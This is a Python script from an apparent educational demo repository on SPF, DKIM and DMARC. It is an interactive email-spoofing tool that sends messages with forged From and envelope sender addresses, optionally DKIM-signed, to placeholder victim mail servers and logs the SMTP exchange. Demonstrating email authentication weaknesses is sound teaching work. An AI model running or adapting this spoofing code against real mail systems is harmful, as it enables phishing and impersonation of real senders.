spf-dkim-dmarc-demo/attacker/scripts/send_email.py

330 lines
10 KiB
Python
Executable File
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python3
#
# SPDX-FileCopyrightText: 2023 Afnic
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
from argparse import ArgumentParser
from email.message import EmailMessage
import email.utils
import importlib.resources
import json
import pathlib
import re
import smtplib
import sys
import uuid
import dkim
from rich.console import Console
import rich.highlighter
import rich.panel
from rich.prompt import Confirm, Prompt
import rich.text
from rich.theme import Theme
import spoof_templates
DEFAULT_HELO = "attaquant.example"
ATTACKER_DOMAIN = "attaquant.example"
ATTACKER_MAIL_FROM = "usurpateur@attaquant.example"
VICTIM_NAME = "Destinataire"
VICTIM_DOMAIN = "destinataire.example"
VICTIM_MX = "mx.destinataire.example"
VICTIM_ADDRESS = f"destinataire@{VICTIM_DOMAIN}"
class SMTPHighlighter(rich.highlighter.Highlighter):
patterns = {
'helo': r'(?:HELO|EHLO) (?P<helo>.*)',
'mail_from': r'MAIL FROM:<(?P<mail_from>.*?)>',
'rcpt_to': r'RCPT TO:<(?P<rcpt_to>.*)>',
'data': r'From: (?P<data_display_name>.* <(?P<data_from>.*)>)'
}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.state = 'connect'
def highlight(self, text):
if pattern := SMTPHighlighter.patterns.get(self.state, None):
if mobj := re.match(pattern, text.plain):
for style in mobj.groupdict().keys():
start, end = mobj.start(style), mobj.end(style)
text.stylize(style, start, end)
custom_theme = Theme({
"banner": "bold red",
"incoming": "yellow",
"outgoing": "cyan",
"helo": "bold sea_green1",
"mail_from": "bold underline sky_blue1",
"rcpt_to": "bold underline pale_violet_red1",
"data_from": "bold underline medium_purple1",
"data_display_name": "medium_purple1",
"comment": "#777777",
"failure": "bold red",
"success": "green",
"text": "default"
})
console = Console(highlighter=None, theme=custom_theme)
class SMTP(smtplib.SMTP):
def __init__(self, output, **kwargs):
super().__init__(**kwargs)
self.highlighter = SMTPHighlighter()
self.log = [];
self.output = output
def trace(self, s, direction):
if direction not in ['in', 'out']:
raise ValueError("direction must be 'in' or 'out'")
arrows = {'in': '[incoming]←[/]', 'out': '[outgoing]→[/]'}
max_lines = 4
if isinstance(s, bytes):
s = s.decode('utf-8')
lines = [{'class': 'text', 'text': text} for text in s.splitlines()]
# lines = [self.highlighter(rich.text.Text(line)) for line in s.splitlines()]
if len(lines) > max_lines:
suppressed_count = len(lines[max_lines:-1])
if suppressed_count > 1:
suppressed_text = f"{suppressed_count} lignes omises"
else:
suppressed_text = f"{suppressed_count} ligne omise"
suppressed_obj = {'class': 'comment', 'text': suppressed_text}
lines = lines[:max_lines] + [suppressed_obj] + lines[-1:]
# Print the text on the console
if self.output:
for i, l in enumerate(lines):
prefix = arrows[direction] if i == 0 else " "
console.print(f" {prefix} ", end=None)
console.print(l['text'], style=l['class'])
if direction == 'in':
console.print()
# Save it internally too
self.log.append({'direction': direction, 'lines': lines})
def putcmd(self, cmd, args=''):
super().putcmd(cmd.upper(), args)
def send(self, s):
self.trace(s, 'out')
super().send(s)
def getreply(self):
errcode, errmsg = super().getreply()
lines = errmsg.decode('us-ascii').splitlines()
lines = [
f"{errcode}{' ' if i == len(lines) - 1 else '-'}{line}"
for i, line in enumerate(lines)
]
self.trace('\n'.join(lines), 'in')
return errcode, errmsg
def connect(self, *args, **kwargs):
self.log.append({'direction': 'comment',
'lines': [{'class': 'comment',
'text': 'Connexion établie au serveur'}]})
return super().connect(*args, **kwargs)
def ehlo(self, *args, **kwargs):
self.highlighter.state = 'helo'
return super().ehlo(*args, **kwargs)
def mail(self, *args, **kwargs):
self.highlighter.state = 'mail_from'
return super().mail(*args, **kwargs)
def rcpt(self, *args, **kwargs):
self.highlighter.state = 'rcpt_to'
return super().rcpt(*args, **kwargs)
def data(self, *args):
self.highlighter.state = 'data'
return super().data(*args)
def ask_helo():
response = Prompt.ask("Nom dhôte dans le [helo]HELO[/helo]",
console=console,
default=DEFAULT_HELO)
return response
def ask_mail_from(default_mail_from):
console.print("Adresse RFC5321.MailFrom :")
console.print(f" 1. Utiliser le même que le RFC5322.From ([b]{default_mail_from}[/])")
console.print(f" 2. Remplacer par une adresse quon maîtrise ([b]{ATTACKER_MAIL_FROM}[/])")
console.print()
choices = {
1: default_mail_from,
2: ATTACKER_MAIL_FROM
}
while True:
try:
response = Prompt.ask("Choix", console=console)
result = choices[int(response)]
console.print(f" ⇒ [mail_from]{result}[/]")
return result
except ValueError:
pass
except IndexError:
pass
def add_dkim_signature(email):
if Confirm.ask("Ajouter une signature DKIM ?", choices="on", default=False):
email_bytes = email.as_string().encode('utf-8')
selector = Prompt.ask("Sélecteur")
private_key = pathlib.Path(f"{selector}.private").read_bytes()
selector = selector.encode('ascii')
domain = Prompt.ask("Domaine", default=ATTACKER_DOMAIN).encode('ascii')
signature_line = dkim.dkim_sign(email_bytes, selector, domain, private_key).decode('ascii')
signature = re.match("^DKIM-Signature: (.*)\r\n", signature_line, re.DOTALL).group(1)
console.print(" ⇒ Signature DKIM ajoutée")
email['DKIM-Signature'] = signature
else:
console.print(" ⇒ Pas de signature DKIM")
return email
def generate_email(template):
msg = template.msg
msg['To'] = f"{VICTIM_NAME} <{VICTIM_ADDRESS}>"
msg['Date'] = email.utils.formatdate()
msg['Message-ID'] = f"{uuid.uuid4()}@{DEFAULT_HELO}"
if not msg['Content-Type']:
msg['Content-Type'] = "text/plain; charset=utf-8"
return msg
def ask_template():
templates = spoof_templates.spoof_templates()
console.print("[bold]Sélectionner un scénario :[/]")
for i, template in enumerate(templates):
console.print(f"{i + 1:4}. {template.nice_name}")
console.print()
while True:
try:
response = Prompt.ask("Choix")
result = templates[int(response) - 1]
console.print(f" ⇒ [bold]{result.nice_name}[/]")
console.print()
return result
except ValueError:
pass
except IndexError:
pass
def send_email(helo, envelope_from, email, output=True):
data = email.as_string().encode('utf-8')
with SMTP(local_hostname=helo, output=output) as smtp:
try:
smtp.connect(VICTIM_MX)
smtp.sendmail(envelope_from, VICTIM_ADDRESS, data)
return {'outcome': 'success', 'log': smtp.log}
except smtplib.SMTPException:
return {'outcome': 'failure', 'log': smtp.log}
except:
raise
def interactive_main():
try:
console.print(
rich.panel.Panel(
"🕱 Outil dusurpation didentité de courriel 🕱",
style="banner",
width=80))
console.print()
template = ask_template()
display_name, rfc5322from = re.match('(.*) <(.*)>', template.msg['From']).groups()
console.print(f"Adresse RFC5322.From (tirée du scénario):")
console.print(f" ⇒ [data_display_name]{display_name} <[data_from]{rfc5322from}[/data_from]>[/]")
console.print()
envelope_from = ask_mail_from(rfc5322from)
console.print()
helo = ask_helo()
console.print()
email = generate_email(template)
signed_email = add_dkim_signature(email)
results = send_email(helo, envelope_from, signed_email, output=True)
if results['outcome'] == 'success':
console.print(" [success]✔[/] Message [success]accepté[/] par le serveur SMTP")
elif results['outcome'] == 'failure':
console.print(" [failure]✘[/] Message [failure]rejeté[/] par le serveur SMTP")
except KeyboardInterrupt:
console.print()
pass
except:
raise
def main():
parser = ArgumentParser()
parser.add_argument('--non-interactive', default=False, action='store_true')
parser.add_argument('--get-config', default=False, action='store_true')
parser.add_argument('--template')
parser.add_argument('--replace-rfc5321-mail-from', default=False, action='store_true')
parser.add_argument('--helo', default=DEFAULT_HELO)
args = parser.parse_args()
if args.non_interactive:
if args.get_config:
config = {
'default_helo': DEFAULT_HELO,
'my_mail_from': ATTACKER_MAIL_FROM,
'templates': [{'id': t.name,
'name': t.nice_name,
'from_name': re.match('(.*) <(.*)>', t.msg['From']).group(1),
'from_address': re.match('(.*) <(.*)>', t.msg['From']).group(2)}
for t in spoof_templates.spoof_templates()]
}
print(json.dumps(config))
else:
templates = {t.name: t for t in spoof_templates.spoof_templates()}
template = templates[args.template]
rfc5322from, = re.match('.* <(.*)>', template.msg['From']).groups()
if args.replace_rfc5321_mail_from:
envelope_from = ATTACKER_MAIL_FROM
else:
envelope_from = rfc5322from
email = generate_email(template)
results = send_email(args.helo, envelope_from, email, output=False)
print(json.dumps(results))
else:
interactive_main()
if __name__ == '__main__':
main()